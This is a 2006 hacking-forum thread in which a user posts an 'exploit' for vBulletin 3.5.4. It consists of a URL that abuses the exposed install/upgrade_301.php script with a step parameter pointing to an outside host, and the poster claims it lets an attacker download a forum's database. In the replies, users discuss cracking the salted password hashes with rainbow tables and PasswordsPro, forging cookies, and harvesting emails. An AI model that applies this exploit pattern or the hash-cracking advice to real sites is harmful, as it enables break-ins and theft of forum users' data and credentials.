M4k3
Jul 5 2006, 07:10 PM
Hello,
Here I will show you how to hack a vBulletin 3.5.4:
video:
CODE
http://www.pldsecurity.de/sec.videos/vbulletin/vbulletinhack.swf
exploit:
CODE
##############################################
vBulletin 3.5.4 exploit.....install path is open or not secure
###############################################
Discovered By M4k3 PLDsoft Security Team, www.pldsoft.com
Remote : Yes
Critical Level : Dangerous
############################################
Affected software description :
Application : vbulletin
version : latest version [ 3.60 Release 4 ]
URL : http://www.vbulletin.com
########################################
Exploit:
www.vicitimsite.com/forumpath/install/upgrade_301.php?step=http://ww.pldsoft.com
when it works, you can still download the database.....
########################################
Contact:
Nick: M4k3
E-mail: mikathebest2003@yahoo.de
Homepage: http://www.pldsoft.com
Mouhahaha
Jul 5 2006, 08:29 PM
seems nice, can someone upload the video somewhere else ? i can't download from rapidshare... thanks
stay
Jul 5 2006, 09:07 PM
see attachment
Mouhahaha
Jul 5 2006, 09:16 PM
thanks alot!
thend
Jul 6 2006, 07:37 AM
I think all the hashes are salted md5 and can't be easily cracked.What about crafting a cookie:).Hard
M4k3
Jul 6 2006, 09:59 AM
QUOTE(thend @ Jul 6 2006, 07:37 AM)
I think all the hashes are salted md5 and can't be easily cracked.What about crafting a cookie:).Hard
you'd need rainbow tables with all possible salt(s) combinations...
darkbluefirefly
Jul 6 2006, 02:56 PM
what if it asks for customer id? then the exploit is invalid right?
M4k3
Jul 6 2006, 03:04 PM
Well, then the board is protected, im still working on a new exploits who will break it down.
crock
Jul 6 2006, 07:06 PM
could you post the php-code where the error is located in upgrade_301.php please?
It's probably just a variable that can be accessed only if globals is on in php.ini ... no?
KonT
Jul 6 2006, 08:26 PM
Coool
M4k3
Jul 6 2006, 09:19 PM
QUOTE(crock @ Jul 6 2006, 07:06 PM)
could you post the php-code where the error is located in upgrade_301.php please?
It's probably just a variable that can be accessed only if globals is on in php.ini ... no?
The most files in the install order have this error.
like upgrade_302.php etc...
i will post the php-code tomorrow....
Novalok
Jul 6 2006, 10:33 PM
This is just nulled boards. Am i correct?
M4k3
Jul 7 2006, 07:02 AM
Nulled boards, but you can try also normal version sometimes it works.
You can only use this against ripped vbulletin software because its only vunerable if they remove that identifcation thing which rippers do so people are able to use the forum software. So vbulletin is not vunerable only the ripped versions of it are.
-toe
boshcash
Jul 8 2006, 12:34 AM
the nulled scripts only are vuln , and u cant make any thing except collect database info from this exploit as i think because the md5 are encrypted with random salts so its almost impossible to crack them using tables because no one currently has tables for every possible salt
btw this was known a couple of months ago i used to test it on some boards (this maybe used to harvest mails or any evil idea) but i dont know if its really a vuln or not , and i dont think vbulletin will respond because the legit forums are secure ..
FiSh
Jul 12 2006, 05:49 AM
The salts are found in the same table as the usernames. Using PasswordsPro you can crack the hashes (with salts) using dictionaries, and in some cases going to the 4th step causes a MySQL database error that does not allow the site to be accessed.
This is only an issue with nulled versions of vBulletin - legitimate versions downloaded from vBulletin require authentication of one type or another.
M4k3
Jul 12 2006, 09:37 AM
QUOTE(FiSh @ Jul 12 2006, 05:49 AM)
This is only an issue with nulled versions of vBulletin - legitimate versions downloaded from vBulletin require authentication of one type or another.
I think, i have say it 100 times or more....but now for you again. We working on to crack the customer numbers...but it have to take a while.
Mouhahaha
Jul 13 2006, 03:53 PM
hehehe good luck on "cracking" the customer numbers...
M4k3
Jul 13 2006, 08:36 PM
Well, everybody say cracking....but i never have say i will crack it....cracking seems to long. There much better ways.
runtime
Aug 2 2006, 08:47 PM
Lovely video. I like it a lot. But I can see the kiddies among us who want to be ub3r l33t in their spare time on their Windows 98 running on an Intel MMX overclocked to 400mhz by their sister, looking at this video, memorising it, and then saying "I'm l33t! L0LZ!!!!1!!!"
Heh heh, and then again, maybe not...
Canucka
Oct 5 2008, 08:58 PM
QUOTE (stay @ Jul 5 2006, 10:07 PM)
see attachment
Cant download
illwill
Oct 5 2008, 10:09 PM
QUOTE (Canucka @ Oct 5 2008, 03:58 PM)
Cant download
thanks for opening an old thread Captain Obvious
look at the date it was posted, not alot of shit sticks around for 2 years
Eduardo
Oct 6 2008, 04:22 AM
he cant download it because he is a trial member.
canucka I suggest u to re-read the rules, as they state trials cannot download files from this forum except from the trial members download section
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please
click here.